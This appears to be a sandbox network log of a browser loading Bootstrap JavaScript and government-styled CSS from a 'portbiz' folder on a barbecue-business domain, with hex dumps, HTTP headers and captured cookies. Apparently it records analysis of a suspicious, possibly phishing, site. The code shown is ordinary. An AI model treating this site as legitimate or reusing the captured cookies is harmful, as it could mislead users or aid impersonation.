                                                        2024-12-25 01:23:12 UTC1369INData Raw: 72 20 65 3d 6f 2e 45 76 65 6e 74 28 75 2e 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65
                                                        Data Ascii: r e=o.Event(u.CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._de
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 26 26 70 28 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e
                                                        Data Ascii: &&p(s).removeClass(C)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._elemen
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 22 6d 6f 75 73 65 65 6e 74 65 72 22 2b 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65
                                                        Data Ascii: "mouseenter"+i,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-ite
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e
                                                        Data Ascii: al),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).fin
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 66 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29
                                                        Data Ascii: f(!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 6e 74 28 64 2e 53 4c 49 44 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65
                                                        Data Ascii: nt(d.SLID,{relatedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).re
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 5f 44 41 54 41 5f 41 50 49 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70
                                                        Data Ascii: _DATA_API,function(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collap


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.449766104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:12 UTC1024OUTGET /portbiz/css/mgv2-application.css HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://yungbucksbbq.com/portbiz/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:13 UTC1074INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:13 GMT
                                                        Content-Type: text/css
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Cache-Control: max-age=2592000
                                                        Pragma: public
                                                        Last-Modified: Wed, 11 Dec 2024 06:10:16 GMT
                                                        Expires: Wed, 22 Jan 2025 14:30:35 GMT
                                                        CF-Cache-Status: HIT
                                                        Age: 125558
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VFEniQdKhNQe1eCBw7kq4XaaiW7YxXDsSSi2NqdQpAtlQNB3VmJVLt1X0AN8%2BDnCA%2Fi%2FeinLP1QlkiPy4%2FqK22Ier%2Bw2CBtdhoGjhvQQ%2BgTcIKGscuzA8fQCFUBHpQbrKhcI"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f75064649d4424b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1553&rtt_var=594&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1602&delivery_rate=1822721&cwnd=248&unsent_bytes=0&cid=f62e370bd5b70efd&ts=451&x=0"
                                                        2024-12-25 01:23:13 UTC295INData Raw: 37 63 34 34 0d 0a 2e 70 61 74 68 77 61 79 2d 6c 69 6e 6b 2d 69 74 65 6d 3a 66 6f 63 75 73 2c 2e 61 6c 65 72 74 2d 6c 69 6e 6b 20 2e 61 6c 65 72 74 2d 6c 69 6e 6b 2d 61 72 72 6f 77 3a 66 6f 63 75 73 2c 2e 62 75 74 74 6f 6e 2d 6d 61 69 6e 3a 66 6f 63 75 73 2c 2e 62 75 74 74 6f 6e 2d 6d 61 69 6e 3a 61 63 74 69 76 65 2c 2e 62 75 74 74 6f 6e 2d 6d 69 6e 6f 72 3a 66 6f 63 75 73 2c 2e 62 75 74 74 6f 6e 2d 6d 69 6e 6f 72 3a 61 63 74 69 76 65 2c 2e 62 75 74 74 6f 6e 2d 64 61 6e 67 65 72 3a 66 6f 63 75 73 2c 2e 62 75 74 74 6f 6e 2d 64 61 6e 67 65 72 3a 61 63 74 69 76 65 2c 2e 62 75 74 74 6f 6e 2d 6d 6f 64 61 6c 2d 6d 61 69 6e 3a 66 6f 63 75 73 2c 2e 62 75 74 74 6f 6e 2d 6d 6f 64 61 6c 2d 6d 61 69 6e 3a 61 63 74 69 76 65 2c 2e 62 75 74 74 6f 6e 2d 64 69 67 69 74 61
                                                        Data Ascii: 7c44.pathway-link-item:focus,.alert-link .alert-link-arrow:focus,.button-main:focus,.button-main:active,.button-minor:focus,.button-minor:active,.button-danger:focus,.button-danger:active,.button-modal-main:focus,.button-modal-main:active,.button-digita
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 67 6c 65 3a 61 63 74 69 76 65 2c 2e 62 75 74 74 6f 6e 2d 6d 61 69 6e 2d 6d 61 70 77 61 70 3a 66 6f 63 75 73 2c 2e 62 75 74 74 6f 6e 2d 6d 61 69 6e 2d 6d 61 70 77 61 70 3a 61 63 74 69 76 65 2c 2e 61 6e 63 68 6f 72 3a 66 6f 63 75 73 2c 2e 62 75 74 74 6f 6e 2d 62 61 63 6b 3a 66 6f 63 75 73 2c 2e 62 75 74 74 6f 6e 2d 63 6c 6f 73 65 3a 66 6f 63 75 73 2c 66 6f 72 6d 20 5b 74 79 70 65 3d 27 72 61 64 69 6f 27 5d 3a 66 6f 63 75 73 2b 6c 61 62 65 6c 2c 66 6f 72 6d 20 5b 74 79 70 65 3d 27 63 68 65 63 6b 62 6f 78 27 5d 3a 66 6f 63 75 73 2b 6c 61 62 65 6c 2c 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2c 69 6e 70 75 74 3a 66 6f 63 75 73 2c 6f 70 74 67 72 6f 75 70 3a 66 6f 63 75 73 2c 73 65 6c 65 63 74 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 63 68
                                                        Data Ascii: gle:active,.button-main-mapwap:focus,.button-main-mapwap:active,.anchor:focus,.button-back:focus,.button-close:focus,form [type='radio']:focus+label,form [type='checkbox']:focus+label,button:focus,input:focus,optgroup:focus,select:focus,textarea:focus,.ch
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 7d 68 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 7d 70 72 65 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 62 75 74 74 6f
                                                        Data Ascii: }hr{box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button,select{text-transform:none}butto
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 2e 37 35 65 6d 20 30 20 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 68 65 69 67 68 74 20 35 30 30 6d 73 20 65 61 73 65 2d 6f 75 74 2c 6d 61 72 67 69 6e 2d 74 6f 70 20 35 30 30 6d 73 20 6c 69 6e 65 61 72 2c 6f 70 61 63 69 74 79 20 35 30 30 6d 73 20 6c 69 6e 65 61 72 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 68 65 69 67 68 74 20 35 30 30 6d 73 20 65 61 73 65 2d 6f 75 74 2c 6d 61 72 67 69 6e 2d 74 6f 70 20 35 30 30 6d 73 20 6c 69 6e 65 61 72 2c 6f 70 61 63 69 74 79 20 35 30 30 6d 73 20 6c 69 6e 65 61 72 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6f 70 61 63 69 74 79 3a 31 7d 2e 72 61 65 74 2d 6c 69 6e 65 3a 66 69 72 73 74 2d 63 68 69 6c
                                                        Data Ascii: dth:100%;margin:.75em 0 0;box-sizing:border-box;-webkit-transition:height 500ms ease-out,margin-top 500ms linear,opacity 500ms linear;transition:height 500ms ease-out,margin-top 500ms linear,opacity 500ms linear;height:auto;opacity:1}.raet-line:first-chil
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 3a 23 66 35 66 35 66 35 7d 2e 72 61 65 74 2d 64 72 6f 70 44 6f 77 6e 20 2e 73 65 6c 65 63 74 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 7b 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 7b 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 2e 72 61 65 74 2d 73 70 69 6e 6e 65 72 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69
                                                        Data Ascii: :#f5f5f5}.raet-dropDown .selected{background-color:#eee}@-webkit-keyframes rotate{100%{-webkit-transform:rotate(360deg)}}@keyframes rotate{100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}.raet-spinner{pointer-events:none;display:block;posi
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 63 68 6f 73 65 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 63 68 6f 73 65 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 68 6f 73 65 6e 2d 64 72 6f 70 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 30 30 25 3b 6c 65 66 74 3a 2d 39 39 39 39 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 31
                                                        Data Ascii: rtical-align:middle;font-size:1rem;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;width:100%}.chosen-container *{box-sizing:border-box}.chosen-container .chosen-drop{position:absolute;top:100%;left:-9999px;z-index:101
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 74 65 3b 74 6f 70 3a 34 30 25 3b 72 69 67 68 74 3a 32 36 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 32 70 78 3b 68 65 69 67 68 74 3a 31 32 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2e 2e 2f 69 63 6f 6e 73 2f 63 68 6f 73 65 6e 2d 73 70 72 69 74 65 2e 70 6e 67 22 29 20 2d 34 32 70 78 20 31 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 70 78 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 2e 63 68 6f 73 65 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 20 2e 63 68 6f 73 65 6e 2d 73 69 6e 67 6c 65 20 61 62 62 72 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 34 32 70 78 20 2d 31 30 70 78 7d 2e 63 68 6f 73 65 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c
                                                        Data Ascii: te;top:40%;right:26px;display:block;width:12px;height:12px;background:url("../icons/chosen-sprite.png") -42px 1px no-repeat;font-size:1px;color:#333}.chosen-container-single .chosen-single abbr:hover{background-position:-42px -10px}.chosen-container-singl
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 65 6e 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 30 20 34 70 78 20 34 70 78 20 30 3b 70 61 64 64 69 6e 67 3a 30 20 30 20 30 20 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 34 30 70 78 3b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 7d 2e 63 68 6f 73 65 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 68 6f 73 65 6e 2d 72 65 73 75 6c 74 73 20 6c 69 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 35 70 78 20 36 70 78 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 70 78 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 2d 77 65 62 6b 69 74 2d 74 6f 75 63 68 2d 63 61 6c 6c 6f 75
                                                        Data Ascii: en;overflow-y:auto;margin:0 4px 4px 0;padding:0 0 0 4px;max-height:240px;-webkit-overflow-scrolling:touch}.chosen-container .chosen-results li{display:none;margin:0;padding:5px 6px;list-style:none;line-height:15px;word-wrap:break-word;-webkit-touch-callou
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 2e 63 68 6f 73 65 6e 2d 64 69 73 61 62 6c 65 64 7b 6f 70 61 63 69 74 79 3a 2e 35 21 69 6d 70 6f 72 74 61 6e 74 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 63 68 6f 73 65 6e 2d 64 69 73 61 62 6c 65 64 20 2e 63 68 6f 73 65 6e 2d 73 69 6e 67 6c 65 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 63 68 6f 73 65 6e 2d 64 69 73 61 62 6c 65 64 20 2e 63 68 6f 73 65 6e 2d 63 68 6f 69 63 65 73 20 2e 73 65 61 72 63 68 2d 63 68 6f 69 63 65 20 2e 73 65 61 72 63 68 2d 63 68 6f 69 63 65 2d 63 6c 6f 73 65 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 63 68 6f 73 65 6e 2d 72 74 6c 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 2e 63 68 6f 73 65 6e 2d 72 74 6c 20 2e 63 68 6f 73 65 6e 2d 73 69 6e 67 6c 65 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c
                                                        Data Ascii: .chosen-disabled{opacity:.5!important;cursor:default}.chosen-disabled .chosen-single{cursor:default}.chosen-disabled .chosen-choices .search-choice .search-choice-close{cursor:default}.chosen-rtl{text-align:right}.chosen-rtl .chosen-single{overflow:visibl
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 30 70 78 20 2d 32 30 70 78 3b 64 69 72 65 63 74 69 6f 6e 3a 72 74 6c 7d 2e 63 68 6f 73 65 6e 2d 72 74 6c 2e 63 68 6f 73 65 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 20 2e 63 68 6f 73 65 6e 2d 73 69 6e 67 6c 65 20 64 69 76 20 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 36 70 78 20 32 70 78 7d 2e 63 68 6f 73 65 6e 2d 72 74 6c 2e 63 68 6f 73 65 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 2e 63 68 6f 73 65 6e 2d 77 69 74 68 2d 64 72 6f 70 20 2e 63 68 6f 73 65 6e 2d 73 69 6e 67 6c 65 20 64 69 76 20 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 31 32 70 78 20 32 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65
                                                        Data Ascii: 0px -20px;direction:rtl}.chosen-rtl.chosen-container-single .chosen-single div b{background-position:6px 2px}.chosen-rtl.chosen-container-single.chosen-with-drop .chosen-single div b{background-position:-12px 2px}@media only screen and (-webkit-min-device


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.449767104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:12 UTC1014OUTGET /portbiz/css/blugov.css HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
